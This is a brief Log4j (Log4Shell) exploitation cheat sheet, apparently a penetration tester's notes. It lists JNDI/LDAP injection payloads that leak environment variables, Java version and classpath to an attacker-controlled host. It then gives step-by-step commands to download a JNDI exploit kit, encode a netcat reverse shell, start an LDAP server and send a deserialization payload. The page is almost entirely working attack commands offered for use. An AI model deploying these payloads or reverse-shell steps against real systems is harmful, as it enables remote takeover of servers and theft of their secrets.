Log4j

  • Test payload

## ------------------| Run netcat lis
nc -lvnp 4545

## ------------------| Payload
${jndi:ldap://<HOSTIP>:4545/h4rithd}
${jndi:ldap://<HOSTIP>:4545/${java:os}} 
${jndi:ldap://<HOSTIP>:4545/${env:ftp_user}}
${jndi:ldap://<HOSTIP>:4545/${java:version}} 
${jndi:ldap://<HOSTIP>:4545/${sys:java.class.path}} 
${jndi:ldap://<HOSTIP>:4545/${sys:java.class.path}....${java:version}....${java:os}}                    
  • Exploit

## ------------------| Step 0x01
wget https://github.com/pimps/JNDI-Exploit-Kit/raw/master/target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar

## ------------------| Step 0x02
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh  -i 2>&1|nc <HOSTIP> 4545  >/tmp/f' | base64 -w 0

## ------------------| Step 0x03
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L <HOSTIP>:1389

## ------------------| Step 0x04
nc -lvnp 4545
${jndi:ldap://<HOSTIP>:1389/serial/CommonsCollections5/exec_unix/<base64>}

Last updated